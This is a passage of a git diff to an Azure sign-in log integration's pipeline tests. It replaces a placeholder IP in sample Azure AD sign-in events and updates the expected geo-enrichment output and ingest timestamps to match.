Gäste","enforcedGrantControls":["Mfa"],"enforcedSessionControls":[],"id":"22222222-e960-42e6-ae3a-355df7e475d5","result":"notApplied"},{"conditionsNotSatisfied":12,"conditionsSatisfied":19,"displayName":"02 - Mobile Device Policy","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-877a-4100-a0cf-5a589f2da3ad","result":"notApplied"},{"conditionsNotSatisfied":16,"conditionsSatisfied":3,"displayName":"04 - Block Legacy Authentication","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-8e59-4055-87b1-b54a055a7ca5","result":"notApplied"},{"conditionsNotSatisfied":1,"conditionsSatisfied":0,"displayName":"06 - Enterprise Apps","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-39cb-4ec4-8ed2-ac1352d260ba","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"03 - Require MFA for Admins","enforcedGrantControls":["Mfa"],"enforcedSessionControls":[],"id":"22222222-ea2f-4502-abb7-3689a1b0da41","result":"notApplied"},{"conditionsNotSatisfied":1,"conditionsSatisfied":0,"displayName":"07 - PowerAutomate Pilot","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-8b95-43cb-8e7d-69e34704ab56","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"02c - Mobile Device Policy Device Compliance","enforcedGrantControls":["RequireCompliantDevice"],"enforcedSessionControls":[],"id":"22222222-ff75-460a-800c-7fe88bd9c877","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"02d - MacOS","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-9886-4897-b2e2-a096cd37bac3","result":"notApplied"}],"authenticationDetails":[],"authenticationProcessingDetails":[{"key":"Is Client Capable","value":"True"},{"key":"IsCAEToken","value":"False"}],"authenticationRequirement":"singleFactorAuthentication","authenticationRequirementPolicies":[],"autonomousSystemNumber":3320,"clientAppUsed":"Mobile Apps and Desktop clients","conditionalAccessStatus":"success","correlationId":"22222222-18ab-4afa-aa79-21af67c8b108","createdDateTime":"2021-07-30T11:20:59.7789167+00:00","crossTenantAccessType":"none","deviceDetail":{"browser":"Edge 18.1836","deviceId":"22222222-1e7a-44dc-8bc9-5736d8e2b063","displayName":"ABCDEFG","operatingSystem":"Windows 10","trustType":"Hybrid Azure AD joined"},"flaggedForReview":false,"homeTenantId":"22222222-902d-4dea-8026-5a790862fede","id":"22222222-fb7b-4f83-bf74-3876f9ef3900","ipAddress":"11.22.33.44","isInteractive":false,"isTenantRestricted":false,"location":{"city":"Hannover","countryOrRegion":"DE","geoCoordinates":{"latitude":50.12345678912345,"longitude":9.123456789123456},"state":"Niedersachsen"},"networkLocationDetails":[{"networkNames":["Hannover"],"networkType":"trustedNamedLocation"}],"originalRequestId":"22222222-fb7b-4f83-bf74-3876f9ef3900","privateLinkDetails":{},"processingTimeInMilliseconds":65,"resourceDisplayName":"Office 365 Exchange Online","resourceId":"22222222-0000-0ff1-ce00-000000000000","resourceTenantId":"22222222-902d-4dea-8026-5a790862fede","riskDetail":"none","riskEventTypes":[],"riskEventTypes_v2":[],"riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","ssoExtensionVersion":"","status":{"errorCode":0},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363","userDisplayName":"Hello World","userId":"22222222-473d-4f4e-a526-ff54e71afe84","userPrincipalName":"hello.world@company.de","userType":"Member"},"resourceId":"/tenants/22222222-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam","resultSignature":"None","resultType":"0","tenantId":"22222222-902d-4dea-8026-5a790862fede","time":"2021-07-30T11:20:59.7789167Z"} \ No newline at end of file +{"Level":4,"callerIpAddress":"81.2.69.144","category":"NonInteractiveUserSignInLogs","correlationId":"22222222-18ab-4afa-aa79-21af67c8b108","durationMs":0,"identity":"Hello World","location":"DE","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Microsoft Teams","appId":"22222222-bce4-4aaf-ab1b-5451cc387264","appliedConditionalAccessPolicies":[{"conditionsNotSatisfied":0,"conditionsSatisfied":7,"displayName":"01 - Require Windows Hybrid AD Joined Device","enforcedGrantControls":["RequireDomainJoinedDevice"],"enforcedSessionControls":[],"id":"22222222-b7da-4d9e-ae41-779c5c256ac8","result":"success"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"05 - MFA für Gäste","enforcedGrantControls":["Mfa"],"enforcedSessionControls":[],"id":"22222222-e960-42e6-ae3a-355df7e475d5","result":"notApplied"},{"conditionsNotSatisfied":12,"conditionsSatisfied":19,"displayName":"02 - Mobile Device Policy","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-877a-4100-a0cf-5a589f2da3ad","result":"notApplied"},{"conditionsNotSatisfied":16,"conditionsSatisfied":3,"displayName":"04 - Block Legacy Authentication","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-8e59-4055-87b1-b54a055a7ca5","result":"notApplied"},{"conditionsNotSatisfied":1,"conditionsSatisfied":0,"displayName":"06 - Enterprise Apps","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-39cb-4ec4-8ed2-ac1352d260ba","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"03 - Require MFA for Admins","enforcedGrantControls":["Mfa"],"enforcedSessionControls":[],"id":"22222222-ea2f-4502-abb7-3689a1b0da41","result":"notApplied"},{"conditionsNotSatisfied":1,"conditionsSatisfied":0,"displayName":"07 - PowerAutomate Pilot","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-8b95-43cb-8e7d-69e34704ab56","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"02c - Mobile Device Policy Device Compliance","enforcedGrantControls":["RequireCompliantDevice"],"enforcedSessionControls":[],"id":"22222222-ff75-460a-800c-7fe88bd9c877","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"02d - MacOS","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-9886-4897-b2e2-a096cd37bac3","result":"notApplied"}],"authenticationDetails":[],"authenticationProcessingDetails":[{"key":"Is Client Capable","value":"True"},{"key":"IsCAEToken","value":"False"}],"authenticationRequirement":"singleFactorAuthentication","authenticationRequirementPolicies":[],"autonomousSystemNumber":3320,"clientAppUsed":"Mobile Apps and Desktop clients","conditionalAccessStatus":"success","correlationId":"22222222-18ab-4afa-aa79-21af67c8b108","createdDateTime":"2021-07-30T11:20:59.7789167+00:00","crossTenantAccessType":"none","deviceDetail":{"browser":"Edge 18.1836","deviceId":"22222222-1e7a-44dc-8bc9-5736d8e2b063","displayName":"ABCDEFG","operatingSystem":"Windows 10","trustType":"Hybrid Azure AD joined"},"flaggedForReview":false,"homeTenantId":"22222222-902d-4dea-8026-5a790862fede","id":"22222222-fb7b-4f83-bf74-3876f9ef3900","ipAddress":"81.2.69.144","isInteractive":false,"isTenantRestricted":false,"location":{"city":"Hannover","countryOrRegion":"DE","geoCoordinates":{"latitude":50.12345678912345,"longitude":9.123456789123456},"state":"Niedersachsen"},"networkLocationDetails":[{"networkNames":["Hannover"],"networkType":"trustedNamedLocation"}],"originalRequestId":"22222222-fb7b-4f83-bf74-3876f9ef3900","privateLinkDetails":{},"processingTimeInMilliseconds":65,"resourceDisplayName":"Office 365 Exchange Online","resourceId":"22222222-0000-0ff1-ce00-000000000000","resourceTenantId":"22222222-902d-4dea-8026-5a790862fede","riskDetail":"none","riskEventTypes":[],"riskEventTypes_v2":[],"riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","ssoExtensionVersion":"","status":{"errorCode":0},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363","userDisplayName":"Hello World","userId":"22222222-473d-4f4e-a526-ff54e71afe84","userPrincipalName":"hello.world@company.de","userType":"Member"},"resourceId":"/tenants/22222222-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam","resultSignature":"None","resultType":"0","tenantId":"22222222-902d-4dea-8026-5a790862fede","time":"2021-07-30T11:20:59.7789167Z"} \ No newline at end of file diff --git a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-non-interactive-user.log-expected.json b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-non-interactive-user.log-expected.json index c68d4594b3c..a699faee34e 100644 --- a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-non-interactive-user.log-expected.json +++ b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-non-interactive-user.log-expected.json @@ -7,15 +7,24 @@ "source": { "geo": { "continent_name": "Europe", - "country_name": "France", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 2.3387, - "lat": 48.8582 - }, - "country_iso_code": "FR" + "lon": -1.3614, + "lat": 51.7095 + } + }, + "as": { + "number": 20712, + "organization": { + "name": "Andrews \u0026 Arnold Ltd" + } }, - "address": "11.22.33.44", - "ip": "11.22.33.44" + "address": "81.2.69.144", + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -38,16 +47,16 @@ }, "related": { "ip": [ - "11.22.33.44" + "81.2.69.144" ] }, "client": { - "ip": "11.22.33.44" + "ip": "81.2.69.144" }, "event": { "duration": 0, - "ingested": "2021-09-28T19:32:36.565325400Z", - "original": "{\"Level\":4,\"callerIpAddress\":\"11.22.33.44\",\"category\":\"NonInteractiveUserSignInLogs\",\"correlationId\":\"22222222-18ab-4afa-aa79-21af67c8b108\",\"durationMs\":0,\"identity\":\"Hello World\",\"location\":\"DE\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Microsoft Teams\",\"appId\":\"22222222-bce4-4aaf-ab1b-5451cc387264\",\"appliedConditionalAccessPolicies\":[{\"conditionsNotSatisfied\":0,\"conditionsSatisfied\":7,\"displayName\":\"01 - Require Windows Hybrid AD Joined Device\",\"enforcedGrantControls\":[\"RequireDomainJoinedDevice\"],\"enforcedSessionControls\":[],\"id\":\"22222222-b7da-4d9e-ae41-779c5c256ac8\",\"result\":\"success\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"05 - MFA für Gäste\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[],\"id\":\"22222222-e960-42e6-ae3a-355df7e475d5\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":12,\"conditionsSatisfied\":19,\"displayName\":\"02 - Mobile Device Policy\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-877a-4100-a0cf-5a589f2da3ad\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":16,\"conditionsSatisfied\":3,\"displayName\":\"04 - Block Legacy Authentication\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-8e59-4055-87b1-b54a055a7ca5\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":1,\"conditionsSatisfied\":0,\"displayName\":\"06 - Enterprise Apps\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-39cb-4ec4-8ed2-ac1352d260ba\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"03 - Require MFA for Admins\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[],\"id\":\"22222222-ea2f-4502-abb7-3689a1b0da41\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":1,\"conditionsSatisfied\":0,\"displayName\":\"07 - PowerAutomate Pilot\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-8b95-43cb-8e7d-69e34704ab56\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"02c - Mobile Device Policy Device Compliance\",\"enforcedGrantControls\":[\"RequireCompliantDevice\"],\"enforcedSessionControls\":[],\"id\":\"22222222-ff75-460a-800c-7fe88bd9c877\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"02d - MacOS\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-9886-4897-b2e2-a096cd37bac3\",\"result\":\"notApplied\"}],\"authenticationDetails\":[],\"authenticationProcessingDetails\":[{\"key\":\"Is Client Capable\",\"value\":\"True\"},{\"key\":\"IsCAEToken\",\"value\":\"False\"}],\"authenticationRequirement\":\"singleFactorAuthentication\",\"authenticationRequirementPolicies\":[],\"autonomousSystemNumber\":3320,\"clientAppUsed\":\"Mobile Apps and Desktop clients\",\"conditionalAccessStatus\":\"success\",\"correlationId\":\"22222222-18ab-4afa-aa79-21af67c8b108\",\"createdDateTime\":\"2021-07-30T11:20:59.7789167+00:00\",\"crossTenantAccessType\":\"none\",\"deviceDetail\":{\"browser\":\"Edge 18.1836\",\"deviceId\":\"22222222-1e7a-44dc-8bc9-5736d8e2b063\",\"displayName\":\"ABCDEFG\",\"operatingSystem\":\"Windows 10\",\"trustType\":\"Hybrid Azure AD joined\"},\"flaggedForReview\":false,\"homeTenantId\":\"22222222-902d-4dea-8026-5a790862fede\",\"id\":\"22222222-fb7b-4f83-bf74-3876f9ef3900\",\"ipAddress\":\"11.22.33.44\",\"isInteractive\":false,\"isTenantRestricted\":false,\"location\":{\"city\":\"Hannover\",\"countryOrRegion\":\"DE\",\"geoCoordinates\":{\"latitude\":50.12345678912345,\"longitude\":9.123456789123456},\"state\":\"Niedersachsen\"},\"networkLocationDetails\":[{\"networkNames\":[\"Hannover\"],\"networkType\":\"trustedNamedLocation\"}],\"originalRequestId\":\"22222222-fb7b-4f83-bf74-3876f9ef3900\",\"privateLinkDetails\":{},\"processingTimeInMilliseconds\":65,\"resourceDisplayName\":\"Office 365 Exchange Online\",\"resourceId\":\"22222222-0000-0ff1-ce00-000000000000\",\"resourceTenantId\":\"22222222-902d-4dea-8026-5a790862fede\",\"riskDetail\":\"none\",\"riskEventTypes\":[],\"riskEventTypes_v2\":[],\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"ssoExtensionVersion\":\"\",\"status\":{\"errorCode\":0},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363\",\"userDisplayName\":\"Hello World\",\"userId\":\"22222222-473d-4f4e-a526-ff54e71afe84\",\"userPrincipalName\":\"hello.world@company.de\",\"userType\":\"Member\"},\"resourceId\":\"/tenants/22222222-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"resultType\":\"0\",\"tenantId\":\"22222222-902d-4dea-8026-5a790862fede\",\"time\":\"2021-07-30T11:20:59.7789167Z\"}", + "ingested": "2021-12-09T13:30:59.123869500Z", + "original": "{\"Level\":4,\"callerIpAddress\":\"81.2.69.144\",\"category\":\"NonInteractiveUserSignInLogs\",\"correlationId\":\"22222222-18ab-4afa-aa79-21af67c8b108\",\"durationMs\":0,\"identity\":\"Hello World\",\"location\":\"DE\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Microsoft Teams\",\"appId\":\"22222222-bce4-4aaf-ab1b-5451cc387264\",\"appliedConditionalAccessPolicies\":[{\"conditionsNotSatisfied\":0,\"conditionsSatisfied\":7,\"displayName\":\"01 - Require Windows Hybrid AD Joined Device\",\"enforcedGrantControls\":[\"RequireDomainJoinedDevice\"],\"enforcedSessionControls\":[],\"id\":\"22222222-b7da-4d9e-ae41-779c5c256ac8\",\"result\":\"success\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"05 - MFA für Gäste\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[],\"id\":\"22222222-e960-42e6-ae3a-355df7e475d5\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":12,\"conditionsSatisfied\":19,\"displayName\":\"02 - Mobile Device Policy\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-877a-4100-a0cf-5a589f2da3ad\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":16,\"conditionsSatisfied\":3,\"displayName\":\"04 - Block Legacy Authentication\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-8e59-4055-87b1-b54a055a7ca5\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":1,\"conditionsSatisfied\":0,\"displayName\":\"06 - Enterprise Apps\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-39cb-4ec4-8ed2-ac1352d260ba\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"03 - Require MFA for Admins\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[],\"id\":\"22222222-ea2f-4502-abb7-3689a1b0da41\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":1,\"conditionsSatisfied\":0,\"displayName\":\"07 - PowerAutomate Pilot\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-8b95-43cb-8e7d-69e34704ab56\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"02c - Mobile Device Policy Device Compliance\",\"enforcedGrantControls\":[\"RequireCompliantDevice\"],\"enforcedSessionControls\":[],\"id\":\"22222222-ff75-460a-800c-7fe88bd9c877\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"02d - MacOS\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-9886-4897-b2e2-a096cd37bac3\",\"result\":\"notApplied\"}],\"authenticationDetails\":[],\"authenticationProcessingDetails\":[{\"key\":\"Is Client Capable\",\"value\":\"True\"},{\"key\":\"IsCAEToken\",\"value\":\"False\"}],\"authenticationRequirement\":\"singleFactorAuthentication\",\"authenticationRequirementPolicies\":[],\"autonomousSystemNumber\":3320,\"clientAppUsed\":\"Mobile Apps and Desktop clients\",\"conditionalAccessStatus\":\"success\",\"correlationId\":\"22222222-18ab-4afa-aa79-21af67c8b108\",\"createdDateTime\":\"2021-07-30T11:20:59.7789167+00:00\",\"crossTenantAccessType\":\"none\",\"deviceDetail\":{\"browser\":\"Edge 18.1836\",\"deviceId\":\"22222222-1e7a-44dc-8bc9-5736d8e2b063\",\"displayName\":\"ABCDEFG\",\"operatingSystem\":\"Windows 10\",\"trustType\":\"Hybrid Azure AD joined\"},\"flaggedForReview\":false,\"homeTenantId\":\"22222222-902d-4dea-8026-5a790862fede\",\"id\":\"22222222-fb7b-4f83-bf74-3876f9ef3900\",\"ipAddress\":\"81.2.69.144\",\"isInteractive\":false,\"isTenantRestricted\":false,\"location\":{\"city\":\"Hannover\",\"countryOrRegion\":\"DE\",\"geoCoordinates\":{\"latitude\":50.12345678912345,\"longitude\":9.123456789123456},\"state\":\"Niedersachsen\"},\"networkLocationDetails\":[{\"networkNames\":[\"Hannover\"],\"networkType\":\"trustedNamedLocation\"}],\"originalRequestId\":\"22222222-fb7b-4f83-bf74-3876f9ef3900\",\"privateLinkDetails\":{},\"processingTimeInMilliseconds\":65,\"resourceDisplayName\":\"Office 365 Exchange Online\",\"resourceId\":\"22222222-0000-0ff1-ce00-000000000000\",\"resourceTenantId\":\"22222222-902d-4dea-8026-5a790862fede\",\"riskDetail\":\"none\",\"riskEventTypes\":[],\"riskEventTypes_v2\":[],\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"ssoExtensionVersion\":\"\",\"status\":{\"errorCode\":0},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363\",\"userDisplayName\":\"Hello World\",\"userId\":\"22222222-473d-4f4e-a526-ff54e71afe84\",\"userPrincipalName\":\"hello.world@company.de\",\"userType\":\"Member\"},\"resourceId\":\"/tenants/22222222-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"resultType\":\"0\",\"tenantId\":\"22222222-902d-4dea-8026-5a790862fede\",\"time\":\"2021-07-30T11:20:59.7789167Z\"}", "kind": "event", "action": "Sign-in activity", "id": "22222222-fb7b-4f83-bf74-3876f9ef3900", diff --git a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-service-principal.log b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-service-principal.log index 5710f7adcf7..a0265a42067 100644 --- a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-service-principal.log +++ b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-service-principal.log @@ -1 +1 @@ -{"Level":4,"callerIpAddress":"11.22.33.44","category":"ServicePrincipalSignInLogs","correlationId":"22222222-ece3-41ca-8e0d-1f1e1d8ac81a","durationMs":0,"location":"DE","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appId":"22222222-ddf2-4ab6-b25f-f23d5d614338","correlationId":"22222222-ece3-41ca-8e0d-1f1e1d8ac81a","createdDateTime":"2021-07-30T11:29:26.6733668+00:00","crossTenantAccessType":"none","flaggedForReview":false,"id":"22222222-5ec0-4795-bf9f-9017bcc32f00","ipAddress":"11.22.33.44","isInteractive":false,"isTenantRestricted":false,"location":{"city":"Hannover","countryOrRegion":"DE","geoCoordinates":{"latitude":50.12345678912345,"longitude":9.123456789012345},"state":"Niedersachsen"},"processingTimeInMilliseconds":0,"resourceDisplayName":"Configuration Manager Microservice","resourceId":"22222222-c916-4293-8373-d584996f60ae","riskDetail":"none","riskLevelAggregated":"low","riskLevelDuringSignIn":"low","riskState":"none","servicePrincipalId":"22222222-4677-43b4-a1dc-ecb3230e9350","servicePrincipalName":"ConfigMgrSvc_22222222-dfb4-4070-ad95-cf1e68280bb0","status":{"errorCode":7000222},"tokenIssuerType":"AzureAD","userId":null},"resourceId":"/tenants/1111111111-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam","resultSignature":"None","resultType":"7000222","tenantId":"1111111111-902d-4dea-8026-5a790862fede","time":"2021-07-30T11:29:26.6733668Z"} \ No newline at end of file +{"Level":4,"callerIpAddress":"81.2.69.144","category":"ServicePrincipalSignInLogs","correlationId":"22222222-ece3-41ca-8e0d-1f1e1d8ac81a","durationMs":0,"location":"DE","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appId":"22222222-ddf2-4ab6-b25f-f23d5d614338","correlationId":"22222222-ece3-41ca-8e0d-1f1e1d8ac81a","createdDateTime":"2021-07-30T11:29:26.6733668+00:00","crossTenantAccessType":"none","flaggedForReview":false,"id":"22222222-5ec0-4795-bf9f-9017bcc32f00","ipAddress":"81.2.69.144","isInteractive":false,"isTenantRestricted":false,"location":{"city":"Hannover","countryOrRegion":"DE","geoCoordinates":{"latitude":50.12345678912345,"longitude":9.123456789012345},"state":"Niedersachsen"},"processingTimeInMilliseconds":0,"resourceDisplayName":"Configuration Manager Microservice","resourceId":"22222222-c916-4293-8373-d584996f60ae","riskDetail":"none","riskLevelAggregated":"low","riskLevelDuringSignIn":"low","riskState":"none","servicePrincipalId":"22222222-4677-43b4-a1dc-ecb3230e9350","servicePrincipalName":"ConfigMgrSvc_22222222-dfb4-4070-ad95-cf1e68280bb0","status":{"errorCode":7000222},"tokenIssuerType":"AzureAD","userId":null},"resourceId":"/tenants/1111111111-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam","resultSignature":"None","resultType":"7000222","tenantId":"1111111111-902d-4dea-8026-5a790862fede","time":"2021-07-30T11:29:26.6733668Z"} \ No newline at end of file diff --git a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-service-principal.log-expected.json b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-service-principal.log-expected.json index 1b333b4bfbf..7bb15bff40d 100644 --- a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-service-principal.log-expected.json +++ b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-service-principal.log-expected.json @@ -7,15 +7,24 @@ "source": { "geo": { "continent_name": "Europe", - "country_name": "France", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 2.3387, - "lat": 48.8582 - }, - "country_iso_code": "FR" + "lon": -1.3614, + "lat": 51.7095 + } + }, + "as": { + "number": 20712, + "organization": { + "name": "Andrews \u0026 Arnold Ltd" + } }, - "address": "11.22.33.44", - "ip": "11.22.33.44" + "address": "81.2.69.144", + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -38,16 +47,16 @@ }, "related": { "ip": [ - "11.22.33.44" + "81.2.69.144" ] }, "client": { - "ip": "11.22.33.44" + "ip": "81.2.69.144" }, "event": { "duration": 0, - "ingested": "2021-09-28T19:32:37.460479700Z", - "original": "{\"Level\":4,\"callerIpAddress\":\"11.22.33.44\",\"category\":\"ServicePrincipalSignInLogs\",\"correlationId\":\"22222222-ece3-41ca-8e0d-1f1e1d8ac81a\",\"durationMs\":0,\"location\":\"DE\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appId\":\"22222222-ddf2-4ab6-b25f-f23d5d614338\",\"correlationId\":\"22222222-ece3-41ca-8e0d-1f1e1d8ac81a\",\"createdDateTime\":\"2021-07-30T11:29:26.6733668+00:00\",\"crossTenantAccessType\":\"none\",\"flaggedForReview\":false,\"id\":\"22222222-5ec0-4795-bf9f-9017bcc32f00\",\"ipAddress\":\"11.22.33.44\",\"isInteractive\":false,\"isTenantRestricted\":false,\"location\":{\"city\":\"Hannover\",\"countryOrRegion\":\"DE\",\"geoCoordinates\":{\"latitude\":50.12345678912345,\"longitude\":9.123456789012345},\"state\":\"Niedersachsen\"},\"processingTimeInMilliseconds\":0,\"resourceDisplayName\":\"Configuration Manager Microservice\",\"resourceId\":\"22222222-c916-4293-8373-d584996f60ae\",\"riskDetail\":\"none\",\"riskLevelAggregated\":\"low\",\"riskLevelDuringSignIn\":\"low\",\"riskState\":\"none\",\"servicePrincipalId\":\"22222222-4677-43b4-a1dc-ecb3230e9350\",\"servicePrincipalName\":\"ConfigMgrSvc_22222222-dfb4-4070-ad95-cf1e68280bb0\",\"status\":{\"errorCode\":7000222},\"tokenIssuerType\":\"AzureAD\",\"userId\":null},\"resourceId\":\"/tenants/1111111111-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"resultType\":\"7000222\",\"tenantId\":\"1111111111-902d-4dea-8026-5a790862fede\",\"time\":\"2021-07-30T11:29:26.6733668Z\"}", + "ingested": "2021-12-09T13:30:59.521517Z", + "original": "{\"Level\":4,\"callerIpAddress\":\"81.2.69.144\",\"category\":\"ServicePrincipalSignInLogs\",\"correlationId\":\"22222222-ece3-41ca-8e0d-1f1e1d8ac81a\",\"durationMs\":0,\"location\":\"DE\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appId\":\"22222222-ddf2-4ab6-b25f-f23d5d614338\",\"correlationId\":\"22222222-ece3-41ca-8e0d-1f1e1d8ac81a\",\"createdDateTime\":\"2021-07-30T11:29:26.6733668+00:00\",\"crossTenantAccessType\":\"none\",\"flaggedForReview\":false,\"id\":\"22222222-5ec0-4795-bf9f-9017bcc32f00\",\"ipAddress\":\"81.2.69.144\",\"isInteractive\":false,\"isTenantRestricted\":false,\"location\":{\"city\":\"Hannover\",\"countryOrRegion\":\"DE\",\"geoCoordinates\":{\"latitude\":50.12345678912345,\"longitude\":9.123456789012345},\"state\":\"Niedersachsen\"},\"processingTimeInMilliseconds\":0,\"resourceDisplayName\":\"Configuration Manager Microservice\",\"resourceId\":\"22222222-c916-4293-8373-d584996f60ae\",\"riskDetail\":\"none\",\"riskLevelAggregated\":\"low\",\"riskLevelDuringSignIn\":\"low\",\"riskState\":\"none\",\"servicePrincipalId\":\"22222222-4677-43b4-a1dc-ecb3230e9350\",\"servicePrincipalName\":\"ConfigMgrSvc_22222222-dfb4-4070-ad95-cf1e68280bb0\",\"status\":{\"errorCode\":7000222},\"tokenIssuerType\":\"AzureAD\",\"userId\":null},\"resourceId\":\"/tenants/1111111111-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"resultType\":\"7000222\",\"tenantId\":\"1111111111-902d-4dea-8026-5a790862fede\",\"time\":\"2021-07-30T11:29:26.6733668Z\"}", "kind": "event", "action": "Sign-in activity", "id": "22222222-5ec0-4795-bf9f-9017bcc32f00", diff --git 